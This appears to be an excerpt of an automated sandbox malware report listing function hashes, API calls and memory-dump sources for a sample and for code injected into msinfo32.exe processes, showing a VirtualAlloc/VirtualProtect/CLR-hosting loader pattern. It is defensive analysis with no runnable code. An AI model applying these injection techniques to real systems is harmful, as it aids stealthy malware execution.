Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID: s [... omitted frame ...]
API String ID: 2381555830-3732609013
Opcode ID: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
Instruction ID: 07b3588bb3fe9af1af9c47bf38aa0aa516458edefd6f0a817b903b4f0ba97db5
Opcode Fuzzy Hash: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
Instruction Fuzzy Hash: 70516932219B8489EB21DF25E8903ED3BA0F349B98F584166EF4E47B59DF38C585C380

Function 00BA3160 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00BA3209

Strings

Address %p has no image-section, xrefs: 00BA3160, 00BA3345
VirtualQuery failed for %d bytes at address %p, xrefs: 00BA335B

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 1804819252-157664173
Opcode ID: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
Instruction ID: e299105e3e91fbf3d23f8f95270738c1ad0570fe796602bf9fab025010e46f7d
Opcode Fuzzy Hash: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
Instruction Fuzzy Hash: 5B31AF73B0AA4096EF118B1AEC4179977E1FB56FA4F488165EE5D07350DB78CA86C700

Function 00BA2FE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
Unknown error, xrefs: 00BA30CC

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
Instruction ID: 42222cca69b835e0f435e16c3555a89e46fb3bb07caa769e20165368993e2318
Opcode Fuzzy Hash: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
Instruction Fuzzy Hash: 56016163918F84C3D6118F1CE8003AA7370FBAEB89F659716EB8C26515DB69D692C700

Function 00BA30B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00BA30B0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
Instruction ID: 13039195b29780be5c51a30939f0ef2b0a4852633cb8ee2c0557c7d6bd19996b
Opcode Fuzzy Hash: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
Instruction Fuzzy Hash: BAF03653918E8482D242DF1CA4003AB7370FB9EB98F655716EF8D3A515DF64D5829700

Function 00BA30A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
Overflow range error (OVERFLOW), xrefs: 00BA30A0

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
Instruction ID: ef5e42d192185747c38a4be7c5c6b60299fbc97da45e0dc256a74c8d6ab5cf83
Opcode Fuzzy Hash: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
Instruction Fuzzy Hash: FEF03652918E8482D2429F2CA4003AB7370FB9EB98F655716EF8D3A515DF64D5829700

Function 00BA3090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

Partial loss of significance (PLOSS), xrefs: 00BA3090
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
Instruction ID: 04790cbde7e2917dbc0a679b3f1bbd0813a9a39c58b4fc483a83b46c7fbf30c3
Opcode Fuzzy Hash: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
Instruction Fuzzy Hash: EBF03652918E8482D2429F1CA8003AB7374FB9EB98F655716EF8D3A515DF64D5829700

Function 00BA3080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

Argument domain error (DOMAIN), xrefs: 00BA3080
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
Instruction ID: 54356efb24c758b229fb5e780c1fdddf5f87c52a1baf631ce65a7ecfe7ce7d64
Opcode Fuzzy Hash: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
Instruction Fuzzy Hash: 23F03652918E8482D2429F1CE4003AB7370FB9EB98F655716EF8D3A515DF64D5829700

Function 00BA30C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047
Total loss of significance (TLOSS), xrefs: 00BA30C0

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
Instruction ID: 450b0ab177f89e933fbcb428ef5ca7ce1e23d41825b6f596979249e44216260d
Opcode Fuzzy Hash: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
Instruction Fuzzy Hash: F3F03652918E8882D3029F1CA8003AB7370FB9EB98F659716EF8D3A515DF64D5C29700

Function 00BA3018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00BA3060

Strings

Argument singularity (SIGN), xrefs: 00BA3018
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00BA3047

Memory Dump Source

Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
Instruction ID: fbc6a078bcd1ffaf8d262cf790ff9381d0655cf344d85487ad8fac6df8bcfa64
Opcode Fuzzy Hash: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
Instruction Fuzzy Hash: ECF03062918E8882D202DF1CA8003AB7370FB9EB99F659716EF8D3A515DF64D5828700

Analysis Process: msinfo32.exePID: 6888, Parent PID: 6544COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	88
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00000204FD67119C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000204FD67120F

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: dbdaba800f1c6c2dd3255913fbbb1e6ad07ba2db10471ddd918a39c97f3bcc80
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: CFC1B571314F0E4BFB59FA28C49D7A9B3D3FB98300F14926AD95AC3587DF24E9428681

Function 00000204FD670104 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000204FD6729B4: LoadLibraryA.KERNELBASE ref: 00000204FD672A82

VirtualProtect.KERNELBASE ref: 00000204FD670180
VirtualProtect.KERNELBASE ref: 00000204FD6701A9
VirtualProtect.KERNELBASE ref: 00000204FD6701EE
VirtualProtect.KERNELBASE ref: 00000204FD670212

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: d6f2d304afe49892b07ed20e6e618ff9fb1e77298dcffe052e1c0d5b343aed01
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 9531B23130CB0D4BEB58FE28A84D36AB3D6E7C8721F004269A95BC32CADD61DD0646D1

Function 00000204FD670173 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000204FD670180
VirtualProtect.KERNELBASE ref: 00000204FD6701A9
VirtualProtect.KERNELBASE ref: 00000204FD6701EE
VirtualProtect.KERNELBASE ref: 00000204FD670212

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: 60afd5dc3ce1c8bc78ee4392cfca906f8d8e316d217ed9667d62ab2c583985dd
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: F121903170CB0D4BEB58FA5CA859369B3D2E7C8721F10426AED4BC32CADD20DD024681

Function 00000204FD670F28 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 00000204FD670F74
SysAllocString.OLEAUT32 ref: 00000204FD671090
SafeArrayDestroy.OLEAUT32 ref: 00000204FD671174

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 9021d1a40c1f2a092e67c1300cb5005f31a14ed5913c49a2274d8573697bc836
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 05816E31218A498FE768EF28C88DBA6B7E5FF99301F00462ED58AC7551DF34E505CB82

Function 00000204FD6729B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000204FD672A82

Strings

l, xrefs: 00000204FD672A1C

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 44b4e6b6d51b1467b1c1a562a0cba7e1b8bce3ddfd2c21d3fad422fd759a4a89
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: E331A660918B8A4FF755EB2DC048726BBD5FBAD308F2496ACC1DAC7553DB20D8468701

Function 00000204FD670230 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000204FD6729B4: LoadLibraryA.KERNELBASE ref: 00000204FD672A82

VirtualProtect.KERNELBASE ref: 00000204FD67027E
VirtualProtect.KERNELBASE ref: 00000204FD6702A6

Memory Dump Source

Source File: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000204FD660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_204fd660000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: c4409b8d5e3f47fe3c1d39613534cabe9b62d79708722f3332b41224eef71b39
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 0B11A571718B0D4BEB94FB18988D76A73E6FBD8301F044579AC4AC7286DE20DD418781

Function 00007FFD9B8A0E15 Relevance: .5, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7277c7d57855d524ea7edf9281791e0e883ec3216df7c0ee9cba3e14f5052c05
Instruction ID: 9d584c2727862a7fc835432ddbdad988a98efce5f93564618e0c4be1aaa8a52d
Opcode Fuzzy Hash: 7277c7d57855d524ea7edf9281791e0e883ec3216df7c0ee9cba3e14f5052c05
Instruction Fuzzy Hash: 0B012B55A0C7880FE3469B3824718E57FA0DF66344B0900E7E898CB1F7E8189A458351

Function 00007FFD9B8A055D Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e823a0291c79aed59e202d04a7b6b1d2cdb4b9424cc41d49109277549d55ab81
Instruction ID: 51f14ab6a415b216947ab163fec291f08e02e485175abd0d0f486ec58ae7ab4b
Opcode Fuzzy Hash: e823a0291c79aed59e202d04a7b6b1d2cdb4b9424cc41d49109277549d55ab81
Instruction Fuzzy Hash: A8712761F1DA8D0FE799A77854799E97BB1EFAA34070100FAD05DC71E7EC1CA9068311

Function 00007FFD9B8A0949 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918ce3a8bc5cdb2fdb371311f41d8031a3a9316995401ebb36b54f991c503058
Instruction ID: 325e4dd860bd011faf3448bc35725e4c0294d1c67bcbf040d78942397eaf203d
Opcode Fuzzy Hash: 918ce3a8bc5cdb2fdb371311f41d8031a3a9316995401ebb36b54f991c503058
Instruction Fuzzy Hash: C841FBB1E18A8E4FEB49EB6894A1AE97BB1EFA9300F4500F5D01DC72E7DD289901C711

Function 00007FFD9B8A0AD1 Relevance: .1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e264f2c48f12d0aca4eda5c20e98f01d507bc74bbeab06c2d3fee88cfd2ac62
Instruction ID: 0aaacd236f4cf942d536f4fd330e45c72f35fdbfaa0471f59b2dc94d2208926c
Opcode Fuzzy Hash: 7e264f2c48f12d0aca4eda5c20e98f01d507bc74bbeab06c2d3fee88cfd2ac62
Instruction Fuzzy Hash: 62310921F189495FE784BBAC58697BC77E2EFD8715F0542B6E00CC32D6DD28580283A2

Function 00007FFD9B8A0849 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb5fab5153de021237691ff41db927f7f3a5b03a5a5511406bacf282f83aec2
Instruction ID: a83451081478499cd7a595021b91c3e82218e8bd7854f63653572abae2b75225
Opcode Fuzzy Hash: 5bb5fab5153de021237691ff41db927f7f3a5b03a5a5511406bacf282f83aec2
Instruction Fuzzy Hash: 2D318F20B1CA494FEB88EF2C946A778B2C2EF9C315F0505BEA05EC72E7DD289C418741

Function 00007FFD9B8A07D6 Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3818cd240d33096a9710850cea94d5513eeb07ed4290f7288cb031f6915b1747
Instruction ID: 373d01eb6402902d1f676fa5385d7001b1ab73c37f3856c0722de03ca0eca340
Opcode Fuzzy Hash: 3818cd240d33096a9710850cea94d5513eeb07ed4290f7288cb031f6915b1747
Instruction Fuzzy Hash: 6601F94245F6D21FD797467948695A23FE9CED756470E00FBE58CCA1A3D84D1807C3B2

Function 00007FFD9B8A0120 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1898426795.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20baf954922f6c5b81e7997157e10f50dbc2b6af09f42db46af39aedff20b238
Instruction ID: cff8b6e457dc76a8d46a5d831518753cb63dca7928794cde36dc42ed8e8cd607
Opcode Fuzzy Hash: 20baf954922f6c5b81e7997157e10f50dbc2b6af09f42db46af39aedff20b238
Instruction Fuzzy Hash: 1FE0C043A2B40D0BE2B8501D0C6D472478CDFE89987150436F10DC22A2EC442C0341E1

Analysis Process: msinfo32.exePID: 908, Parent PID: 2284COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	89
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000027ADED7119C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000027ADED7120F

Memory Dump Source

Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: 8fd0359ebf06b94a50b5bbe5207aae6c9cc1f7bf65adf6e90c34035b970a92c3
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: 48C1773071D9054BEB79FB28C4A97ADB3D1FBD4314F5842A9D88FC7585DF20E9428682

Function 0000027ADED70104 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027ADED729B4: LoadLibraryA.KERNELBASE ref: 0000027ADED72A82

VirtualProtect.KERNELBASE ref: 0000027ADED70180
VirtualProtect.KERNELBASE ref: 0000027ADED701A9
VirtualProtect.KERNELBASE ref: 0000027ADED701EE
VirtualProtect.KERNELBASE ref: 0000027ADED70212

Memory Dump Source

